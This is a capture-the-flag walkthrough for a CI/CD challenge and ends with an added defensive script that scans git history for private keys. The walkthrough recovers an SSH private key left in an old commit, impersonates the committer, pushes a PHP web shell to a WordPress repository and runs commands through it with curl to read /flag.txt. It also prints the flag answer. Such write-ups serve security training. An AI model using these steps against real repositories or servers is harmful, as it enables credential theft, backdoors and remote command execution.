Jolly CI/CD

Elfen Ring

Rippin Proudboot

Hints
1) The thing about Git is that every step of development is accessible, even steps you didn't mean to take! git log can show code skeletons.

2) Gitlab repo http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git

3) If you find a way to impersonate another identity, you might try re-cloning a repo with their credentials.

Clone the Git repo and change into the directory it was cloned into

git clone http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git
cd wordpress.flag.net.internal

List the commit history. It shows a commit with a "whoops" comment, which points to a potential mistake

git log --oneline

Show the full log with commit details. It looks like sporx@kringlecon.com made the commit with the "whoops" comment.

git log

Show what was committed under that ID, e19f653bde9ea3de6af21a587e41e7a909db1ca5.
It looks like the user has committed their private and public keys, so we will use these to clone the repo and commit changes while impersonating the user

git show e19f653bde9ea3de6af21a587e41e7a909db1ca5

Create the .ssh folder, then create the private key (.deploy) and the public key (.deploy.pub) from the contents above

mkdir /home/samways/.ssh
cd /home/samways/.ssh
nano .deploy

nano .deploy.pub

ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP7AsdI7HOvk4piOcwLZfDotPqBj2tDq9NBdTUkbZBri sporx@kringlecon.com

 

Set read and write permission for the owner only

chmod 600 .deploy
chmod 600 .deploy.pub 
ls -lah

Set the git config email and name

git config --global user.email "sporx@kringlecon.com"
git config --global user.name "knee-oh"

Start the SSH agent

eval "$(ssh-agent -s)"

Add the SSH private key to the SSH agent

ssh-add .deploy

Clone the Git repo again over SSH, using the private key of the user sporx@kringlecon.com, into a directory named "wordpress.flag.net.internal2"

git clone git@gitlab.flag.net.internal:rings-of-powder/wordpress.flag.net.internal.git wordpress.flag.net.internal2

The repo is now cloned to the "wordpress.flag.net.internal2" directory

ls wordpress.flag.net.internal2

Create a new backdoor to execute commands on the remote host (the WordPress web server, wordpress.flag.net.internal). It takes a query string cmd=<URL-encoded command>

nano shell.php

Add the newly saved shell.php and commit to the repo

git add .
git commit

Push the changes to the remote repository

git push

Now we can execute arbitrary commands using shell.php. The example below runs ls, which also lists the newly uploaded shell.php

curl http://wordpress.flag.net.internal/shell.php?cmd=ls

List the contents of the root directory (/), which shows flag.txt

curl http://wordpress.flag.net.internal/shell.php?cmd=ls%20%2F%2F

Get the contents of /flag.txt

curl http://wordpress.flag.net.internal/shell.php?cmd=cat%20%2Fflag.txt

Answer : oI40zIuCcN8c3MhKgQjOMN8lfYtVqcKT

The objective is now completed, and we get 100 coins as well

At this point we have recovered the Elfen ring
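
A defensive check for the leak this walkthrough relies on: a private key that stays recoverable from commit history even after a "whoops" cleanup commit. This is an added example, not part of the original write-up; the function names and the sample log (hashes, author, path, key body) are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag commits whose diffs add or remove a private key header.
# Real use: scan_repo /path/to/clone   (needs git; walks the history of all refs)

# Parse `git log -p --format='commit %H %ae'` output from stdin.
# Prints one line per hit: <commit> <author-email> <added|removed> <path>
scan_patch_log() {
  awk '
    /^commit [0-9a-f]+ / { sha = $2; author = $3; next }
    /^diff --git /       { path = $NF; sub(/^b\//, "", path); next }
    # "+" = key entered history here; "-" = key deleted, yet still recoverable
    /^[+-]-----BEGIN [A-Z ]*PRIVATE KEY-----/ {
      action = (substr($0, 1, 1) == "+") ? "added" : "removed"
      print sha, author, action, path
    }
  '
}

scan_repo() {
  git -C "${1:-.}" log -p --all --format='commit %H %ae' | scan_patch_log
}

# Constructed sample log: a key is added, then deleted by a later commit.
sample_log() {
  cat <<'EOF'
commit 2222222 dev@example.com

diff --git a/keys/deploy b/keys/deploy
deleted file mode 100644
--- a/keys/deploy
+++ /dev/null
@@ -1,3 +0,0 @@
------BEGIN OPENSSH PRIVATE KEY-----
-(constructed placeholder, not a real key)
------END OPENSSH PRIVATE KEY-----
commit 1111111 dev@example.com

diff --git a/keys/deploy b/keys/deploy
new file mode 100644
--- /dev/null
+++ b/keys/deploy
@@ -0,0 +1,3 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+(constructed placeholder, not a real key)
+-----END OPENSSH PRIVATE KEY-----
EOF
}

sample_log | scan_patch_log
```

Any hit, whether added or removed, means the key is readable by anyone who can clone the repo, so it should be treated as exposed and rotated.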